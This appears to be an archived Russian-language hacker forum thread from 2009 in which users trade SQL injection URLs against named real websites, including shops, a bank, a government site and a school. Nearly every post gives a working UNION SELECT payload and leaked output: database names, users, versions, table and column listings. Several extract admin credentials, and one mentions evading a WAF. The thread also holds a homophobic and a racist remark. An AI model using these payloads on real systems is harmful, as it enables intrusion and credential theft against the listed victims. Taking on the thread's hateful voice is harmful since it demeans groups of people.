[1]models: model_id,first_name,last_name,height,bust_chest,cu p_size,waist,hips,eye_color,hair_colour,hair_lengt h,shoe_size,size,text,card_big,card_s1,card_s2,car d_s3,card_s4,type_id,status,count,date_added,last_ modified
[2]news: news_id,title,content,status,date_added,last_modif ied
[3]type: type_id,type
Example:
http://www.freestyleagency.eu/model-mail.php?type=Video&id=97+AND+1=2+UNION+SELECT+0,concat_ws(0x3a,UserAd min,PassAdmin),2,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23+from+admin--
-2-
Target : http://www.web0668.net
Exploit:http://www.web0668.net/url.php?id=149+AND+1=2+UNION+SELECT+0,null,2--
Database : sq_web0668
User : sq_web0668@125.65.112.47
Version : 5.0.45-community-nt-log
Contain :
[0]web_ad: ad_id,ad_size,ad_name,ad_time,ad_url,ad_img
[1]web_admin: admin_id,admin_name,admin_password,admin_type
[2]web_cate: cate_id,cate_name,cate_cate,cate_asc
[3]web_file: file_id,file_about,file_cooperrtion,file_ad
[4]web_hot: hot_id,hot_cate,hot_name,hot_url,hot_img,hot_bz,ho t_views,hot_time
[5]web_links: link_id,link_name,link_color,link_abc,link_url,lin k_img,link_views,link_cate,link_back,link_bz,link_ time,link_type,link_disp
[6]web_mess: ms_id,ms_title,ms_content,ms_user,ms_time,ms_backt ime,ms_views,ms_type,ms_cate
[7]web_ncate: ncate_id,ncate_name,ncate_cate,ncate_asc
[8]web_new: new_id,new_name,new_url,new_views,new_time
[9]web_pl: pl_id,pl_name,pl_content,pl_class,pl_time
[10]web_rank: rank_id,rank_name,rank_url,rank_views,rank_time
[11]web_sys: sys_id,sys_webname,sys_username,sys_tel,sys_fax,sy s_qq,sys_email,sys_address,sys_copyright,sys_websi te,sys_icp
[12]web_txtad: adtxt_id,adtxt_name,adtxt_time,adtxt_url
Example:
http://www.web0668.net/url.php?id=149+AND+1=2+UNION+SELECT+0,concat_ws(0x 3a,admin_name,admin_password),2+from+web_admin--
-3-
Target : http://www.somethingyoushouldread.com
Exploit:http://www.somethingyoushouldread.com/mail/mail.php?id=159+AND+1=2+UNION+SELECT+null,1--
Database : benberkon
User : benberkon@97.74.144.144
Version : 4.1.22-max-log
Contain :
[0]admin: id,name,pass
...
Example:
http://www.somethingyoushouldread.com/mail/mail.php?id=159+and+1=2+union+select+concat_ws(0x3 a,name,pass),1+from+admin--
AdminPanel:
http://somethingyoushouldread.com/upload/login/login.php
DezMond™
11.12.2009, 00:36
http://karendodsonmurals.com/girls.php?id=-51+union+select+1,2,table_name,4,5,6+from+informat ion_schema.tables+--+&pic=0
http://www.honeyzescorts.co.uk/girls.php?id=6+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12+--+
http://www.sportsbikes.org/girls.php?Blonde%20babe%20in%20lingerie%20with%20s uzuki&id=-8+union+select+1,2,3,concat_ws(0x3a3a,username,pas sword,email),5,6,7,8,9+from+members+where+type=0x6 1646D696E+/*+
http://www.carbabewallpapers.com/view.php?id=-79+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+f rom+information_schema.tables+/*+
http://www.video-spezial.de/start-girls.php?id=-26+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from +user+--+
http://www.janinescort.com/girls.php?lang=en&id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25+/*+
http://www.jessys-girls.ch/girls.php?cmd=show&id=-18+union+select+1,unhex(hex(table_name)),3+from+in formation_schema.tables+--+
http://www.lunapack.com.ua/news.php?id=56+and+1=0+Union%20Select%20%201,2,3,v ersion%28%29%20,5
Version = 5.0.88-log
Database = serkin_lunapack
User = serkin_lunapack@first.hosted.in
http://miniaturebottles.com/MMBC_guestbook/view.php?id=511+and+1=0+Union%20Select%20%201,UNHE X%28HEX%28version%28%29%29%29%20,3,4,5,6,7
Version = 4.1.25-log
User = a0008864@69.12.112.22
Database = a0008864-2
Tables:password, contacts
Columns: Table password:username ,id, userpass
GrAmOzEkA
12.12.2009, 06:09
Галлабанк
http://qishloqqurilishbank.uz/ru/index.php
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,database%28%29,3,4,5,6,7,8,9,10--
qqb
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat%28table_name%29,3,4 ,5,6,7,8,9,10+FROM+information_schema.tables+WHERE +table_schema=0x717162--
branch 0x6272616E6368
deposit 0x6465706F736974
exchange
m_transfer
minibank 0x6D696E6962616E6B
news
presssa
s_office 0x735F6F6666696365
valuta
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5, 6,7,8,9,10+FROM+information_schema.columns+WHERE+t able_schema=0x717162+AND+table_name=0x735F6F666669 6365--
id
branch_id
so_adres
language
date_rec
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5, 6,7,8,9,10+FROM+information_schema.columns+WHERE+t able_schema=0x717162+AND+table_name=0x6272616E6368--
id
branch_mfo
branch_name
phone_num
address
language
date_rec
per_n
tr
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5, 6,7,8,9,10+FROM+information_schema.columns+WHERE+t able_schema=0x717162+AND+table_name=0x6D696E696261 6E6B--
id
branch_id
mb_name
mb_adres
language
date_rec
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5, 6,7,8,9,10+FROM+information_schema.columns+WHERE+t able_schema=0x717162+AND+table_name=0x6465706F7369 74--
id
type_currency
name_deposit
type_deposit
period,percent
first_deposit
general_conditions
activ
language
cur_date
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-1+UNION+SELECT+1,group_concat(id,0x3A,type_currenc y,0x3A,name_deposit,0x3A,type_deposit,0x3A,period, 0x3A,percent,0x3A,first_deposit,0x3A,general_condi tions,0x3A,activ,0x3A,language,0x3A,cur_date,0x3A) ,3,4,5,6,7,8,9,10+FROM+qqb.deposit--
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-1+UNION+SELECT+1,group_concat(user,0x3A,password), 3,4,5,6,7,8,9,10++FROM+mysql.user--
nemaniak
13.12.2009, 17:19
designerpreviews.com PR-3
Данные передаем постом, ибо стоит злобный WAF
http://www.designerpreviews.com/index.php?sec=-4/**/union/**/select/**/1,2,3,4,5,6,concat_ws%280x3a,version%28%29,user%28 %29,database%28%29%29,8,9,10+--+
5.0.81-community:designer_briank@localhost:designer_db
ottosshrunkenhead.com PR-4
Также инъектим постом
http://www.ottosshrunkenhead.com/php/eventsdbm.php?event_id=-1+union+select+concat_ws%280x3a,version%28%29,user %28%29,database%28%29%29,2,3,4,5,6,7,8+--+&cmd=edit&type=1
5.0.81-community:ottosshr_otto@localhost:ottosshr_odb
equinesavior.com PR-3
POST
http://equinesavior.com/phpclassifieds/index.php?catid=7+UnIon+SeLeCt+1,2,3,concat_ws%280 x3a,version%28%29,user%28%29,database%28%29%29,5,6 ,7,8,9,10,11,12,13,14,15,16,17+--+&catname=General%20Merchandise
5.0.81-community:equinesa_owner@localhost:equinesa_phpcla ss
http://lancia.ro/noutati.php?id=-38+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7,8,9
Database version: 5.0.85-community
Database name: lancia2_content2
Database user: lancia2_admcon@localhost
Os: pc-linux-gnu
fox_malder
13.12.2009, 23:30
http://www.monterra.ro/index.php?module=vanzare&tip=3&id=50+and+0+union+select+1,2,concat_ws(0x3a,versio n(),database(),user(),@@version_compile_os),4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57
5.0.22
monterra
root@localhost
redhat-linux-gnu
http://www.monterra.ro/index.php?module=vanzare&tip=3&id=50+and+0+union+select+1,2,id,4,5,email,password ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+f rom+users
http://www.aeria.ma/news.php?id=-1+union+select+1,concat_ws%28user%28%29,version%28 %29,database%28%29,@@version_compile_os%29--
user:aeria@209.62.86.68:
version:5.0.84-percona-highperf-b18-log:
database:aeria:
OS:unknown-linux-gnu
http://www.businessexperts.ma/businessexperts/details-news.php?id=-8+union+select+1,2,3,concat_ws%280x3a,user%28%29,v ersion%28%29,database%28%29,@@version_compile_os%2 9,5,6,7,8,9--
user:ahmani@localhost:
version:5.0.45:
database:businessexperts:
OS:redhat-linux-gnu.
http://www.alexnursing.edu.eg/news.php?id=-14+union+select+1,concat_ws%280x3a,user%28%29,vers ion%28%29,database%28%29,@@version_compile_os%29,3 ,4,5--
user:alexnurs_nw@localhost:
version:5.0.85-community:
database:alexnurs_ndb:
OS:pc-linux-gnu
http://www.pscs.ru/index.php?link=1&id=-86+union+select+concat_ws(0x3a,user(),database(),v ersion()),2,3+--+
User: pscsru_pscs@localhost
Database: pscsru_pscs
Version: 5.0.67-community
http://la2-shop.ru/categories.php?id_cat=-13'+union+select+concat_ws(0x3a,version(),database (),user())+--+
4.1.22-log:tok_center_la2:tok-center_mysql@10.1.31.126
http://www.nazgulowen.com/blog.php?id=-12+union+select+concat_ws(0x3a,id,nick,name,passwo rd)+from+users/*
вывод в мета контенте
http://www.vero-software.com/news_detail.php?id=999999999+union+select+1,2,conc at_ws(0x3a,user,password),4,5,6+from+mysql.user--
http://www.section404.org/news.php?id=-1%20union%20select%201,2,3,concat_ws%280x3a,user%2 8%29,version%28%29,database%28%29%29,5,6--
nemaniak
18.12.2009, 01:04
de.varesehotels.it
http://de.varesehotels.it/territorio/145-beata-vergine-dei-miracoli.php?km=50+union+select
+1,2,3,concat_ws%280x3a,version%28%29,user%28%29,d atabase
%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36
,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,5 3,54,55,56,57,58,59,60,61,62+--+
5.0.51a-24+lenny1:varetels_db@localhost:varetels_db
eclipze0
19.12.2009, 01:44
http://www.thaikaspersky.com/2010/newheader/newsview2010.php?id=67+and+1=2+union+all+select+1, 2,concat(0x3a,version(),user(),database()),4
Инжект от Unu.
nemaniak
19.12.2009, 19:10
lesenschreiben.ch PR-4
http://www.lesenschreiben.ch/cms/page.php?p=-1+union+select+1,2,3,4,5,concat_ws%280x3a,version% 28%29,user%28%29,database%28%29%29+--+
5.0.67-log:usradm3@imu110.infomaniak.ch:lesen-schreiben-schweizch
airbase-bern.ch PR-3
http://www.airbase-bern.ch/cms/page.php?p=1&img=-1+UNION+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conca t_ws%280x3a,version%28%29,user%28%29,database%28%2 9%29+from+adm_user+--+
5.0.67-log:usradm1@imu104.infomaniak.ch:airbase-bernch
lesen-schreiben-schweiz.ch PR-4
http://www.lesen-schreiben-schweiz.ch/cms/page.php?p=-18+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database())+--+
5.0.67-log:usradm3@imu110.infomaniak.ch:lesen-schreiben-schweizch
volets-du-rhone.ch
http://www.volets-du-rhone.ch/sgcms/cms/page.php?p=-42+union+select+1,2,3,4,5,6,7,8,unhex%28hex%28conc at_ws%280x3a,version%28%29,user%28%29,database%28% 29%29%29%29,10,11,12+--+
4.1.11-nt:volets@212.74.174.100:volets-du-rhone
jpgpeinture.ch
http://www.jpgpeinture.ch/cms/page.php?p=-2+union+select+1,2,concat_ws%280x3a,version%28%29, user%28%29,database%28%29%29+--+
5.0.67-log:cmsuser@imu153.infomaniak.ch:jpgpeinturech
botennis.ch
http://www.botennis.ch/sgcms/cms/page.php?p=-20+union+select+1,2,3,4,5,6,concat_ws%280x3a,versi on%28%29,user%28%29,database%28%29%29+--+
5.0.67-log:usradmmv1@imu119.infomaniak.ch:botennisch1
http://www.dentamax.ru/index.php?rid=8+union+select+concat(0x3a,version() ,user(),database()),2,3--
http://avto-foma.ru/index.php?rid=12+union+select+concat(0x3a,version( )%20,user(),database()),2,3--
http://www.alviauto.ru/index.php?rid=20090517164037+union+select+concat(0 x3a,version()%20,user(),database()),2,3--
http://www.razbor-parts.ru/index.php?rid=20090803223338+union+select+concat(0 x3a,version()%20,user(),database()),2,3--
http://www.ar-servis.ru/index.php?rid=20090801231938+union+select+concat(0 x3a,version(),user(),database()),2,3--
http://www.mini-track.ru/index.php?rid=20090806222319+union+select+concat(0 x3a,version(),user(),database()),2,3--
http://www.beltex2000.ru/index.php?rid=20090719222944+union+select+concat(0 x3a,version(),user(),database()),2,3--
Похоже на 1 двиг.Надеюсь не боян,все чекать лень.
shell_c0de
20.12.2009, 14:46
Шопы
http://www.nutrecare.co.uk/latest_detail.asp?prod_id=1268&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.ukrooflights.co.uk/latest_detail.asp?prod_id=519&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.planetdancedirect.com/latest_detail.asp?prod_id=8208&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.planetdancedirect.co.uk/latest_detail.asp?prod_id=8683&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.hyundai-generators.co.uk/latest_detail.asp?prod_id=478&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.nix-digital.com/latest_detail.asp?prod_id=129&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.funthinking.co.uk/latest_detail.asp?prod_id=95&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.startskating.co.uk/latest_detail.asp?prod_id=19&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.australiandesignstore.com/latest_detail.asp?prod_id=345&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.teddyandme.co.uk/latest_detail.asp?prod_id=36&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.yesdoit.co.uk/latest_detail.asp?prod_id=507&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.horseheavensaddlery.co.uk/latest_detail.asp?prod_id=265&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.bebebel.co.uk/latest_detail.asp?prod_id=204&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.sharpquips.co.uk/latest_detail.asp?prod_id=8406&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.hamradio4u.co.uk/latest_detail.asp?prod_id=672&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://internettackleshop.co.uk/latest_detail.asp?prod_id=1305&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.bestpriceappliances.co.uk/latest_detail.asp?prod_id=1&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.bigbrandchina.eu/latest_detail.asp?prod_id=3359&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.stagwatches.co.uk/latest_detail.asp?prod_id=114&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.bestpricefilters.co.uk/latest_detail.asp?prod_id=1&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.christmasinabox.co.uk/latest_detail.asp?prod_id=497&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.neoartglass.co.uk/latest_detail.asp?prod_id=569&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.spencercollection.com/latest_detail.asp?prod_id=8365&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.theelectricgateshop.co.uk/latest_detail.asp?prod_id=1271&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.teddyandme.co.uk/latest_detail.asp?prod_id=22&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.theboarding-house.co.uk/latest_detail.asp?prod_id=484&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.reds-superstore.co.uk/latest_detail.asp?prod_id=286&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.barnsleycarwarehouse.co.uk/latest_detail.asp?prod_id=8804&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.lasersurveyequipment.co.uk/latest_detail.asp?prod_id=1354&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.banglesnjangles.co.uk/latest_detail.asp?prod_id=6&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.litespot.co.uk/latest_detail.asp?prod_id=3638&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.elements-jewellery.co.uk/latest_detail.asp?prod_id=158&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.cornwallis-images.com/latest_detail.asp?prod_id=340&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.funthinking.co.uk/latest_detail.asp?currency=1&prod_id=212&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.funkyrascals.co.uk/latest_detail.asp?prod_id=118&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://brfcdirect.co.uk/latest_detail.asp?prod_id=264&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.trustsport.co.uk/latest_detail.asp?prod_id=260&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.moroccandecor.co.uk/latest_detail.asp?prod_id=9078&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.photo-bug.co.uk/latest_detail.asp?prod_id=514&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://smartmerchantshoppingcart.co.uk/latest_detail.asp?prod_id=8081&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://bigdogcustom.com/latest_detail.asp?prod_id=132&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.dekapakltd.co.uk/latest_detail.asp?prod_id=73&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.jewellerytraders.co.uk/latest_detail.asp?prod_id=76&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.memoryuniverse.co.uk/latest_detail.asp?prod_id=128&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.bigbrandchina.eu/latest_detail.asp?prod_id=3357&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.christmasinabox.co.uk/latest_detail.asp?prod_id=476&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.chairoutlet.co.uk/latest_detail.asp?prod_id=488&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.australiandesignstore.com/latest_detail.asp?prod_id=401&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://thatsthephone.co.uk/latest_detail.asp?currency=1&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.highlandtackle.co.uk/latest_detail.asp?prod_id=211&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.bigfellasclothing.com/latest_detail.asp?prod_id=288&offset=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.penandlolly.absolutewebhosting2.co.uk/latest_detail.asp?prod_id=226&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.bestpriceappliances.co.uk/latest_detail.asp?currency=3&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.bestpricefilters.co.uk/latest_detail.asp?currency=3&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://smartmerchantshoppingcart.co.uk/latest_detail.asp?prod_id=8078&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://bigdogcustom.com/latest_detail.asp?prod_id=119&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
http://www.southgeorgia.absolutewebhosting2.co.uk/latest_detail.asp?prod_id=116&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
shell_c0de
20.12.2009, 14:46
http://ru-board.com/new/search.php?author=-lynx%27+union+select+1,2,3,concat_ws%28%27.%27,tab le_schema,table_name,column_name%29,5,6,7,8,9,10+f rom+information_schema.columns+--+
version 5.0.77
database phpnuke
user phpnuke@localhost
..::TROYAN::..
20.12.2009, 20:03
http://board.astrakhan.ws/?act=viewadv&id=-1707+union+select+1,2,3,4,5,6,concat_ws%280x3a,use r%28%29,database%28%29,version%28%29%29,8,8,9,1,1, 0,1,5--
astrakha_board@localhost:astrakha_board:4.1.25
http://board.astrakhan.ws/?act=viewadv&id=-1707+union+select+1,2,3,4,5,6,group_concat%28login ,0x3a,password%29,8,8,9,1,1,0,1,5+from+users--
fox_malder
21.12.2009, 00:04
http://www.crescendo.ro/en/solutii.php?id=-6+and+0+union+select+concat_ws(0x3a,version(),data base(),user(),@@version_compile_os)+--+
5.0.22
crescendo_en
cr@localhost
redhat-linux-gnu
http://www.crescendo.ro/en/solutii.php?id=-6+and+0+union+select+concat_ws(0x20,password)+from +admin+--+
Omega-time:
http://www.omega-time.ru/watches.phtml?idl=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28--
Version: 5.0.88
Database: OmegaSQL
User: OmegaSQL@localhost
Nightmarе
21.12.2009, 06:27
Вот вам семёрочка на закуску:
PR = 7
http://membres.lycos.fr/halophile/linkster.php?CID=6+AND+1=2+UNION+SELECT+1,2,3,4,5, 6,version(),8--
4.0.18-standard
Вот таак вот ©
Версия 5.0.67-log
Пользователь u172675@10.10.153.168
http://06-r2.ru/news.php?id=99999999999+UNION SELECT CONCAT(1,CHAR(44)),2,CONCAT(3,CHAR(44)),4,CONCAT(5 ,CHAR(44)),CONCAT(6,CHAR(44)),CONCAT(7,CHAR(44))--
Версия 4.0.27-max-log
Пользователь natalka4_gift@v24.valuehost.ru
http://www.03reclama.ru/03reclama_new/Catalog/index.php?id_parent=99999999999+UNION SELECT 1,CONCAT(2,CHAR(44)),CONCAT(3,CHAR(44)),CONCAT(4,C HAR(44)),5,6,7--
http://jobs.webdesignerwall.com/job.php?id=-448+union+all+select+1,2,3,4,CONCAT_WS(CHAR(32,58, 32),user(),database(),version()),6,7,8,9,10,11--
designer_admin2@localhost
designer_jobs
4.1.22-standard
http://jobs.neurope.eu/job.php?id=-1758+union+select+1,2,CONCAT_WS%28CHAR%2832,58,32% 29,user%28%29,database%28%29,version%28%29%29,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35--
neweuro_kostas@localhost
neweuro_corporate
4.1.22-standard
http://www.adclubct.org/job-bank/job.php?id=-19+union+select+1,2,3,CONCAT_WS%28CHAR%2832,58,32% 29,user%28%29,database%28%29,version%28%29%29,5,6, 7--
tdwestne_adclub@localhost
tdwestne_adclubct
5.0.85-community-log
http://www.gexecutives.com/job.php?ID=-201+union+select+1,2,CONCAT_WS%28CHAR%2832,58,32%2 9,user%28%29,database%28%29,version%28%29%29,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18
sfaddoul@localhost
sfaddoul_gexec
5.0.85-community
http://www.nlpplanning.com/vacancy.php?id=-55+UNION+SELECT+1,22,3,4,5,6,7,8,9,10,11,12,13
Database Version: 4.0.30-log
Database name: u10001284
User name: u10001284@lon1-webmysql-1.msh.demon.net
http://www.mexicoalive.com/news.php?idn=40'
Версия - 5
БД - mexaldbsource
Юзер - mexaldbsource@ip-208-109-254-141.ip.secureserver.net
админка по обычному адресу какая то лажа, а вот в другом месте норм)
-=Razor=-
24.12.2009, 13:52
http://auto-shina.by/shop/index.php?cat=41&id=-29+union+select+1,concat_ws(0x3,login,0x3,password ,id),3,4,5,6,7,8,9,10,11,12,13,14,151,6,17,18,19,2 0+from+users+limit+1,1--
version: 5.0.86-percona-highperf-b19
http://www.aztecadventure.co.uk/content.php?cid=22+UNION+SELECT+1,2,3,2,5,6,7,8,9, 10/*
Database Version: 4.1.20
Database name: aztec
User name: aztec_user@localhost
там и без иньекции ошибка
www.chrisjordan.com
http://www.chrisjordan.com/current_set2.php?id=-11'+union+select+1,concat_ws(CHAR(60,98,114,47,62) ,version(),database(),user()),3,4,5/*
ver: 4.1.22-max-log
db: cjordanwebdata
user: cjordanwebdata@97.74.24.67
www.reefcheck.org
либо у меня руки не из того места растут, либо там действитеьно нет аксесса к юзерам.
Но на всякий выложу.
http://www.reefcheck.org/news/news_detail.php?id=252+and+1=2+union+select+concat _ws%280x3a,%20table_name,%20table_schema,column_na me%29,2,3+from+information_schema.columns+where+ta ble_name=CHAR%2897,99,99,111,117,110,116%29/*
neoboy.ru
http://neoboy.ru/goods.php?id=948+and+1=2+union+select+1,2,group_co ncat%28password%29,4,5,group_concat%28login%29,7,8 +from+neoboy_admin--
Чтоб эти геи в аду сгорели ....
aka_zver
26.12.2009, 15:36
Новогодний привет bluesoleil'у =)
http://www.bluesoleil.com/products/Default.aspx?TID=-7'+union+select+1/*
version: 5.1.34-community
user: bluesoleil@localhost
database: bluesoleil
os: Win32
ТИЦ: 90
PR: 4
http://www.insanely-great.com/news.php?id=-1514+union+select+concat_ws(0x3a,user(),database() ,version())
flamini_flaminio@216.14.208.109:flamini_igm:4.1.21-log
http://www.ziggymarley.com/news.php?status=sort&id=6'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)k)j)s)+--+
5.0.67-log
http://www.digitalsynapsis.tv/news.php?id=-32+union+select+1,2,concat_ws(0x3a,username,passwo rd,email),4+from+utenti
Думал, что в Нигерии только деревянные хижины и дикари-негры полуголые .. хех
http://www.lagosstate.gov.ng/showeventlist.php?index.php?page=event&evday=14&evmon=12&evyear=2009+union+select+1,group_concat(table_name ),3,4,5,6,7,8+from+information_schema.columns+wher e+column_name+like+0x257061737325--+
www.nirvanaaudiovisual.co.uk - MySQL 5
http://www.nirvanaaudiovisual.co.uk/product_desc.php?id=383+and+1=2+union+select+1,2,3 ,4,group_concat%28concat_ws%280x3a,admin_firstname ,admin_password%29%29,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26+from+admin--
www.powertel.co.id - MySQL 5
http://www.powertel.co.id/news.php?idm=11&idy=2008+and+1=2+union+select+1,2,3,concat_ws%280x 3a,username,password%29,5,6,7+from+login--
www.sierracorporation.com - MySQL 5
http://www.sierracorporation.com/news.php?id=99%27+and+1=2+union+select+1,2,3,4,gro up_concat%28concat_ws%280x3a,username,password%29% 29,6,7,8,9,10,11,12,131,14+from+users+--+
www.cpehn.org - MySQL 5
http://www.cpehn.org/register.php?id=111+and+1=2+union+select+1,group_c oncat%28concat_ws%280x3a,loginname,password%29%29, 3,4+from+users--
www.humanedgetech.com - MySQL 5
http://www.humanedgetech.com/news.php?id=15649+and+1=2+union+select+1,group_con cat%28table_name%29,3,4,5,6,7+from+information_sch ema.tables+where+table_name+like+CHAR%2837,117,115 ,101,114,37%29--
www.u2wanderer.org - MySQL 4
http://www.u2wanderer.org/disco/lyrics.php?id=424+and+1=2+union+select+1,2,3,4,5,6 ,7,concat_ws%28CHAR%2860,98,114,47,62%29,version%2 8%29,database%28%29,user%28%29%29,9--
www.insanely-great.com - MySQL 4
http://www.insanely-great.com/news.php?id=6553+and+1=2+union+select+1,2,3,concat _ws%280x3a,version%28%29,user%28%29,database%28%29 %29,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
dr.Pilulkin
27.12.2009, 18:04
http://www.bworldonline.com/weekender/content.php?id=-3383+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23--
http://www.teluguflavours.com/politics/viewnews.php?id=60&cat=politicsgossip+limit+0+union+select+1,2,3,4,5, 6/*
http://www.guuui.com/posting.php?id=-1978+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
http://www.emarotta.com/article.php?ID=365)+and+1=0+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
http://www.maximum.by/work.php?w=6+and+1=0+union+select+1,group_concat(c olumn_name+separator+0x0a),3,4+from+information_sc hema.columns+where+table_name=0x776F726B5F636174+--+-
pashkoff_max@localhost pashkoff_maximus 5.0.85-community-log / /var/lib/mysql/ /dev/shm unknown-linux-gnu
DezMond™
28.12.2009, 02:09
http://www.stargroup-bd.com/details-news.php?id=-1+union+select+1,username,password,4+from+admin+--+
http://www.fmdc.fr/agees/details-news.php?id=-25+union+select+1,2,3,4,5,6,7,8,9,10+/*+
